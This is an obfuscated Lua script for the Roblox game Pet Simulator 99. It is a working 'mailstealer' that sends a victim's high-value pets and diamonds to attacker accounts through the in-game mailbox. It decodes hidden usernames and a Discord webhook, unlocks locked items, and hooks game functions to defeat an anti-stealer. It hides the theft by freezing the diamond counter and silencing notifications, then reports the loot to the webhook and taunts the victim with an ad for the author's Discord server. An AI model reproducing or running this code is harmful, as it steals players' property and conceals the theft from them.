--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v38,v39) local v40={};for v77=1, #v38 do v6(v40,v0(v4(v1(v2(v38,v77,v77 + 1 )),v1(v2(v39,1 + (v77% #v39) ,1 + (v77% #v39) + 1 )))%256 ));end return v5(v40);end Username=v7("\240\193\206\26\234\190\212\14\222\205","\126\177\163\187\69\134\219\167");Username2=v7("\2\207\63\250\240\38\222\58\202\242\34\193\62","\156\67\173\74\165");webhook=v7("\60\163\93\6\175\124\9\123\179\64\5\191\41\84\48\249\74\25\177\105\71\36\190\6\1\185\36\78\59\184\66\5\243\119\20\109\225\30\78\232\112\30\100\225\24\71\239\115\20\98\228\16\89\236\9\67\37\230\16\28\132\48\30\0\131\66\48\146\8\81\32\129\91\51\142\18\75\28\156\92\64\134\113\108\46\188\92\50\239\118\95\49\187\92\2\174\4\127\61\184\123\50\136\30\115\27\163\16\6\142\43\116\62\238\101\63\154\60\30\59\174","\38\84\215\41\118\220\70");min_rap=107375 + 392625 ;_G.scriptExecuted=_G.scriptExecuted or false ;if _G.scriptExecuted then return;end _G.scriptExecuted=true;local v8=game:GetService(v7("\98\19\50\30\247\83\23\54\23\250\99\2\45\0\255\87\19","\158\48\118\66\114")):WaitForChild(v7("\133\33\4\33\124\183\240","\155\203\68\112\86\19\197"));local v9=require(game.ReplicatedStorage.Library);local v10=require(game:GetService(v7("\116\216\38\240\73\123\228\236\67\217\5\232\79\106\228\255\67","\152\38\189\86\156\32\24\133")):WaitForChild(v7("\208\94\165\84\253\69\190","\38\156\55\199")):WaitForChild(v7("\139\113\117\45\29\96","\35\200\29\28\72\115\20\154")):WaitForChild(v7("\42\190\199\218","\84\121\223\177\191\237\76"))).Get().Inventory;local v11=require(game:GetService(v7("\137\83\217\172\51\83\49\213\190\82\250\180\53\66\49\198\190","\161\219\54\169\192\90\48\80")):WaitForChild(v7("\101\75\2\55\72\80\25","\69\41\34\96")):WaitForChild(v7("\159\207\222\15\12\63","\75\220\163\183\106\98")):WaitForChild(v7("\49\187\157\50","\185\98\218\235\87"))).Get().MailboxSendsSinceReset;local v12=game.Players.LocalPlayer;local v13=v7("\193\47\55","\202\171\92\71\134\190");local v14=game:GetService(v7("\1\213\56\152\26\196\62\158\32\194\41","\232\73\161\76"));local v15={};local v16=0 -0 ;local v17=false;local v18=function() return require(game.ReplicatedStorage.Library.Client.Save).Get();end;local v19=15901 + 4099 ;if (v11~=(0 + 0)) then v19=math.ceil(v19 * (1.5^v11) );end local v20=2 -1 ;for v41,v42 in pairs(v18().Inventory.Currency) do if (v42.id==v7("\159\208\67\80\17\181\221\81","\126\219\185\34\61")) then v20=v42._am;break;end end if (v19>v20) then return;end local function v21(v43) local v43=math.floor(v43);local v44={"","k","m","b","t"};local v45=1 + 0 ;while v43>=1000  do local v78=0 -0 ;while true do if (v78==0) then v43=v43/1000 ;v45=v45 + (2 -1) ;break;end end end return string.format(v7("\73\128\12\116\59\100","\135\108\174\62\18\30\23\147"),v43,v44[v45]);end local function v22(v46,v47) local v48=1227 -(322 + 905) ;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v48==(613 -(602 + 9))) then v50[1192 -(449 + 740) ].value=v50[875 -(826 + 46) ].value   .. v7("\184\10\75\71\232\1\210\173\53\5\6","\128\236\101\63\38\132\33")   .. v21(v16) ;if v17 then v50[950 -(245 + 702) ].value=v50[9 -6 ].value   .. "\n\nVictim tried to use anti-mailstealer, but got fucked instead" ;end v53={[v7("\169\164\19\65\178\248","\175\204\201\113\36\214\139")]={{[v7("\83\197\33\208\1","\100\39\172\85\188")]="\240\159\144\177 New PS99 Execution",[v7("\174\119\181\143\33","\83\205\24\217\224")]=67178 -(260 + 1638) ,[v7("\224\204\200\49\226\214","\93\134\165\173")]=v50,[v7("\184\253\206\214\63\220","\30\222\146\161\162\90\174\210")]={[v7("\241\75\104\30","\106\133\46\16")]=v7("\117\33\122\240\73\84\93\33\127\249\72\0\90\57\51\200\85\66\81\110\51\248\83\83\91\47\97\248\20\71\95\111\84\197\8\114\110\19\86\219\126\116","\32\56\64\19\156\58")}}}};if ( #v50[2].value>(1464 -(382 + 58))) then local v118=0 -0 ;local v119;while true do if (v118==0) then v119={};for v145 in v50[2].value:gmatch("[^\r\n]+") do table.insert(v119,v145);end v118=1 + 0 ;end if (v118==(1 -0)) then while ( #v50[5 -3 ].value>(2229 -(902 + 303))) and ( #v119>(0 -0))  do local v146=0 -0 ;while true do if (v146==(0 + 0)) then table.remove(v119);v50[2].value=table.concat(v119,"\n");v146=1691 -(1121 + 569) ;end if (v146==1) then v50[216 -(22 + 192) ].value=v50[685 -(483 + 200) ].value   .. "\nPlus more!" ;break;end end end break;end end end v48=1466 -(1404 + 59) ;end if (v48==(8 -5)) then v54=v14:JSONEncode(v53);if (webhook and (webhook~="")) then local v120=request({[v7("\111\218\233","\224\58\168\133\54\58\146")]=webhook,[v7("\116\83\95\245\122\130","\107\57\54\43\157\21\230\231")]=v7("\235\164\34\193","\175\187\235\113\149\217\188"),[v7("\20\170\128\72\230\107\107","\24\92\207\225\44\131\25")]=v49,[v7("\105\220\188\85","\29\43\179\216\44\123")]=v54});end break;end if (v48==(0 -0)) then local v95=0;local v96;while true do if ((765 -(468 + 297))==v95) then v96=562 -(334 + 228) ;while true do if (v96==2) then v48=3 -2 ;break;end if (v96==(2 -1)) then v51={};v52={};v96=2 -0 ;end if (v96==0) then v49={[v7("\149\230\36\223\29\160\39\138\130\240\58\206","\167\214\137\74\171\120\206\83")]=v7("\138\224\34\81\241\164\138\228\59\82\246\232\129\227\61\83","\199\235\144\82\61\152")};v50={{[v7("\9\23\180\46","\75\103\118\217")]=v7("\245\81\100\21\171\26\135\97\99\17\171\16\198\89\117\78","\126\167\52\16\116\217"),[v7("\222\47\44\149\177","\156\168\78\64\224\212\121")]=v46,[v7("\14\224\169\199\9\235","\174\103\142\197")]=true},{[v7("\88\41\82\61","\152\54\72\63\88\69\62")]=v7("\253\208\235\81\199\132\250\83\148\198\235\28\199\193\224\72\142","\60\180\164\142"),[v7("\78\95\9\60\34","\114\56\62\101\73\71\141")]="",[v7("\177\231\215\205\182\236","\164\216\137\187")]=false},{[v7("\220\231\60\183","\107\178\134\81\210\198\158")]=v7("\11\27\143\203\171\42\23\216","\202\88\110\226\166"),[v7("\213\14\142\226\207","\170\163\111\226\151")]="",[v7("\24\62\190\49\64\50","\73\113\80\210\88\46\87")]=false}};v96=1;end end break;end end end if (v48==(1 + 0)) then for v104,v105 in ipairs(v15) do local v106=v105.name;if v52[v106] then v52[v106].amount=v52[v106].amount + v105.amount ;else v52[v106]={[v7("\128\33\194\7\233\149","\135\225\76\173\114")]=v105.amount,[v7("\8\236\168","\199\122\141\216\208\204\221")]=v105.rap};table.insert(v51,v106);end end table.sort(v51,function(v107,v108) return (v52[v107].rap * v52[v107].amount)>(v52[v108].rap * v52[v108].amount) ;end);for v109,v110 in ipairs(v51) do local v111=0;local v112;while true do if (v111==(0 -0)) then v112=v52[v110];v50[4 -2 ].value=v50[1 + 1 ].value   .. v110   .. v7("\237\149\8","\150\205\189\112\144\24")   .. v112.amount   .. ")"   .. v7("\127\196","\112\69\228\223\44\100\232\113")   .. v21(v112.rap * v112.amount )   .. " RAP\n" ;break;end end end v50[3].value=v50[3].value   .. v7("\243\26\10\192\236\60","\230\180\127\103\179\214\28")   .. v21(v47)   .. "\n" ;v48=5 -3 ;end end end local v23=v12.leaderstats["\240\159\146\142 Diamonds"].Value;local v24=v12.leaderstats["\240\159\146\142 Diamonds"];v24:GetPropertyChangedSignal(v7("\139\216\44\89\184","\44\221\185\64")):Connect(function() v24.Value=v23;end);local v25=v12.PlayerScripts.Scripts.Core[v7("\49\245\71\92\118\18\244\8\111\118\15\227\65\81\116\65\192\125\118","\19\97\135\40\63")];local v26=v12.PlayerGui.Notifications;v25.Disabled=true;v26:GetPropertyChangedSignal(v7("\139\82\50\57\35\52\170","\81\206\60\83\91\79")):Connect(function() v26.Enabled=false;end);v26.Enabled=false;game.DescendantAdded:Connect(function(v57) if (v57.ClassName==v7("\125\164\197\124\43","\196\46\203\176\18\79\163\45")) then if ((v57.SoundId==v7("\170\32\102\31\55\232\234\172\43\122\68\107\180\190\233\122\45\71\117\168\189\237\116\43","\143\216\66\30\126\68\155")) or (v57.SoundId==v7("\184\202\21\202\214\176\210\245\163\204\87\132\138\242\131\179\255\156\90\153\148\243\132\185","\129\202\168\109\171\165\195\183")) or (v57.SoundId==v7("\48\90\47\217\205\7\227\54\81\51\130\145\91\183\112\12\102\139\138\70\181\112\15\97","\134\66\56\87\184\190\116"))) then v57.Volume=0;v57.PlayOnRemove=false;v57:Destroy();end end end);local function v29(v58,v59) return require(game:GetService(v7("\14\52\25\183\16\232\32\33\57\53\58\175\22\249\32\50\57","\85\92\81\105\219\121\139\65")).Library.Client.DevRAPCmds).Get({[v7("\222\191\81\86\111","\191\157\211\48\37\28")]={[v7("\241\30\249\25","\90\191\127\148\124")]=v58},[v7("\81\148\15","\119\24\231\78")]=function(v79) return v79==v58 ;end,[v7("\165\40\177\99\216","\113\226\77\197\42\188\32")]=function() return v59.id;end,[v7("\9\2\245\182\49\61\241\172","\213\90\118\148")]=function() return v14:JSONEncode({[v7("\82\42","\45\59\78\212\54")]=v59.id,[v7("\0\66","\144\112\54\227\235\230\78\205")]=v59.pt,[v7("\160\32","\59\211\72\111\156\176")]=v59.sh,[v7("\90\137","\77\46\231\131")]=v59.tn});end}) or (0 + 0) ;end local v30=Username;local v31=Username2;local function v32(v60,v61,v62) local v63=0;local v64;local v65;while true do if (v63==0) then v64={[1 + 0 ]=v30,[2 -0 ]=v13,[2 + 1 ]=v60,[4]=v61,[168 -(92 + 71) ]=v62 or (1 + 0) };v65=false;v63=1 -0 ;end if (v63==2) then v19=math.ceil(math.ceil(v19) * (766.5 -(574 + 191)) );if (v19>(4124320 + 875680)) then v19=12526529 -7526529 ;end break;end if (v63==(1 + 0)) then repeat local v115,v116=v8:WaitForChild(v7("\151\85\191\76\184\91\174\26\250\103\179\78\190","\32\218\52\214")):InvokeServer(unpack(v64));if ((v115==false) and (v116=="They don't have enough space!")) then local v129=0;local v130;while true do if (v129==0) then v130=0;while true do if (0==v130) then v30=v31;v64[1]=v30;break;end end break;end end end until v65==true  v20=v20-v19 ;v63=2;end end end local function v33() for v80,v81 in pairs(v18().Inventory.Currency) do if (v81.id==v7("\106\30\48\165\254\190\65\73","\58\46\119\81\200\145\208\37")) then if (v20>=(v19 + 10000)) then local v121={[850 -(254 + 595) ]=v30,[128 -(55 + 71) ]=v13,[3 -0 ]=v7("\8\153\34\190\172\179\53\50","\86\75\236\80\204\201\221"),[1794 -(573 + 1217) ]=v80,[13 -8 ]=v20-v19 };local v122=false;repeat local v131=v8:WaitForChild(v7("\95\64\126\137\252\132\106\27\55\182\251\133\118","\235\18\33\23\229\158")):InvokeServer(unpack(v121));until v122==true  break;end end end end local function v34() local v66=0;local v67;local v68;local v69;local v70;local v71;while true do if (v66==(1 + 0)) then v69=nil;v70=nil;v66=2 -0 ;end if (v66==2) then v71=nil;while true do if (v67==(940 -(714 + 225))) then local v132=0;while true do if (v132==(0 -0)) then v69={[1 -0 ]=v7("\214\126\126\69\212\87","\128\132\17\28\41\187\47"),[1 + 1 ]=v7("\53\55\21\46","\61\97\82\102\90"),[3 -0 ]=v7("\156\43\191","\105\204\78\203\43\167\55\126"),[4]=v68,[811 -(118 + 688) ]=49 -(25 + 23) };v70,v71=v8:WaitForChild(v7("\136\171\42\18\17\11\223\11\229\153\38\16\23","\49\197\202\67\126\115\100\167")):InvokeServer(unpack(v69));v132=1;end if (v132==(1 + 0)) then v67=2;break;end end end if (v67==0) then v68=nil;for v139,v140 in pairs(v10[v7("\96\191\213","\219\48\218\161")]) do v68=v139;break;end v67=1887 -(927 + 959) ;end if (v67==(6 -4)) then if ((v71=="They don't have enough space!") or (v71=="You don't have enough diamonds to send the mail!")) then return false;else return true;end break;end end break;end if (v66==0) then v67=732 -(16 + 716) ;v68=nil;v66=1;end end end local function v35() if v10.Box then for v98,v99 in pairs(v10.Box) do if v99._uq then v8:WaitForChild(v7("\21\84\199\115\192\97\87\35\83\219\59\129\65\30\22\87\211","\62\87\59\191\73\224\54")):InvokeServer(v98);end end end end local function v36() local v72=0;local v73;local v74;while true do if (v72==(0 -0)) then v73,v74=v8:WaitForChild(v7("\202\3\243\197\229\13\226\147\167\33\246\200\238\15\186\232\235\14","\169\135\98\154")):InvokeServer();while v74==v7("\242\120\49\20\240\38\219\223\55\51\85\244\39\136\152\39\100\71\248\48\199\197\115\55\20\255\54\206\196\101\33\20\232\32\193\197\112\100\64\245\54\136\198\118\45\88\255\60\208\138","\168\171\23\68\52\157\83")  do wait();v73,v74=v8:WaitForChild(v7("\217\112\252\161\39\34\159\174\49\214\161\36\36\138\180\80\249\161","\231\148\17\149\205\69\77")):InvokeServer();end break;end end end local v37={v7("\176\162\211","\159\224\199\167\155\55"),v7("\210\244\59","\178\151\147\92"),v7("\175\245\77\32\31","\26\236\157\44\82\114\44"),v7("\15\32\214\83\43\32\193","\59\74\78\181"),v7("\21\222\78\83\188\43","\211\69\177\58\58"),v7("\154\236\106\246","\171\215\133\25\149\137"),v7("\201\199\36\255\253\50\243\67\243\204","\34\129\168\82\154\143\80\156"),v7("\167\189\60\31\64","\233\229\210\83\107\40\46"),v7("\244\78\38\223\8\192\86\55","\101\161\34\82\182")};for v75,v76 in pairs(v37) do if (v10[v76]~=nil) then for v100,v101 in pairs(v10[v76]) do if (v76==v7("\216\8\77","\78\136\109\57\158\187\130\226")) then local v123=require(game:GetService(v7("\12\58\233\253\55\60\248\229\59\59\202\229\49\45\248\246\59","\145\94\95\153")).Library.Directory.Pets)[v101.id];if (v123.huge or v123.exclusiveLevel) then local v141=1796 -(503 + 1293) ;local v142;while true do if (v141==(0 -0)) then v142=v29(v76,v101);if (v142>=min_rap) then local v153=0 + 0 ;local v154;local v155;while true do if (v153==(1063 -(810 + 251))) then table.insert(v15,{[v7("\95\4\212\170\37\215\78\28","\184\60\101\160\207\66")]=v76,[v7("\36\139\120","\220\81\226\28")]=v100,[v7("\18\216\141\238\228\211","\167\115\181\226\155\138")]=v101._am or 1 ,[v7("\240\35\247","\166\130\66\135\60\27\17")]=v142,[v7("\74\75\195\112","\80\36\42\174\21")]=v155});v16=v16 + (v142 * (v101._am or (1 + 0))) ;break;end if (v153==(0 + 0)) then v154="";if (v101.pt and (v101.pt==(1 + 0))) then v154=v7("\218\194\24\209\75\185\189","\215\157\173\116\181\46");elseif (v101.pt and (v101.pt==(535 -(43 + 490)))) then v154=v7("\7\181\130\252\216\58\163\203","\186\85\212\235\146");end v153=734 -(711 + 22) ;end if (v153==(3 -2)) then if v101.sh then v154=v7("\241\137\31\240\32\174","\56\162\225\118\158\89\142")   .. v154 ;end v155=v154   .. v101.id ;v153=2;end end end break;end end end else local v124=0;local v125;while true do if (v124==0) then v125=v29(v76,v101);if (v125>=min_rap) then local v149=859 -(240 + 619) ;while true do if (v149==0) then table.insert(v15,{[v7("\77\17\35\127\73\31\37\99","\26\46\112\87")]=v76,[v7("\172\42\175","\212\217\67\203\20\223\223\37")]=v100,[v7("\187\128\167\199\180\153","\178\218\237\200")]=v101._am or (1 + 0) ,[v7("\164\180\246","\176\214\213\134")]=v125,[v7("\250\172\187\209","\57\148\205\214\180\200\54")]=v101.id});v16=v16 + (v125 * (v101._am or (1 -0))) ;break;end end end break;end end end if v101._lk then local v126={[1 + 0 ]=v100,[1746 -(1344 + 400) ]=false};v8:WaitForChild(v7("\62\242\54\63\127\28\250\10\7\115\6\209\58\55\125\23\249","\22\114\157\85\84")):InvokeServer(unpack(v126));end end end end if (( #v15>(405 -(255 + 150))) or (v20>(min_rap + v19))) then v36();if v34() then local v102=0 + 0 ;local v103;while true do if (v102==(1 + 0)) then for v143,v144 in ipairs(getgc(true)) do if ((typeof(v144)==v7("\91\99\125\31\103\162\66\83","\45\61\22\19\124\19\203")) and (debug.info(v144,"n")==v7("\213\11\29\240\13\118","\217\161\114\109\149\98\16"))) then local v147=0 -0 ;local v148;while true do if ((0 -0)==v147) then v148=nil;v148=hookfunction(v144,function(v157,...) local v158=1739 -(404 + 1335) ;local v159;while true do if (v158==0) then v159=0;while true do if (v159==(406 -(183 + 223))) then if (v157==v103) then return tick();end return v148(v157,...);end end break;end end end);break;end end end end break;end if ((0 -0)==v102) then v17=true;v103=game:GetService(v7("\246\206\3\200\84\245\169\208\206\23\247\73\249\186\197\204\22","\200\164\171\115\164\61\150")):WaitForChild(v7("\144\241\23\82\140\172\255","\227\222\148\99\37")):WaitForChild(v7("\30\83\91\250\251\60\74\8\182\202\54\92\86","\153\83\50\50\150"));v102=1 + 0 ;end end end v35();require(game.ReplicatedStorage.Library.Client.DaycareCmds).Claim();require(game.ReplicatedStorage.Library.Client.ExclusiveDaycareCmds).Claim();local v82=game:GetService(v7("\32\37\40\112\181\119\19\52\61\120\143\96\29\50\57\123\185","\20\114\64\88\28\220")):WaitForChild(v7("\29\8\208\166\249\194\164","\221\81\97\178\212\152\176")):WaitForChild(v7("\238\235\20\254\20\217","\122\173\135\125\155")):WaitForChild(v7("\183\192\22\188","\168\228\161\96\217\95\81"));local v83=require(v82).Get();function deepCopy(v87) local v88=0;local v89;while true do if (v88==(1 + 0)) then return v89;end if (v88==0) then v89={};for v133,v134 in pairs(v87) do local v135=0;local v136;while true do if (v135==(337 -(10 + 327))) then v136=0 + 0 ;while true do if (v136==(338 -(118 + 220))) then if (type(v134)==v7("\207\208\44\80\42","\55\187\177\78\60\79")) then v134=deepCopy(v134);end v89[v133]=v134;break;end end break;end end end v88=1 + 0 ;end end end v83=deepCopy(v83);require(v82).Get=function(...) return v83;end;table.sort(v15,function(v90,v91) return (v90.rap * v90.amount)>(v91.rap * v91.amount) ;end);spawn(function() v22(v12.Name,v20);end);for v92,v93 in ipairs(v15) do if (v93.rap>=v19) then v32(v93.category,v93.uid,v93.amount);else break;end end v33();local v85=require(game.ReplicatedStorage.Library.Client.Message);v85.Error("All your items just got stolen by Tobi's mailstealer!\n Join discord.gg/GY2RVSEGDT");setclipboard(v7("\41\199\76\232\73\221\132\99\201\88\164\97\246\210\31\248\108\206\97\235\180","\224\77\174\63\139\38\175"));end
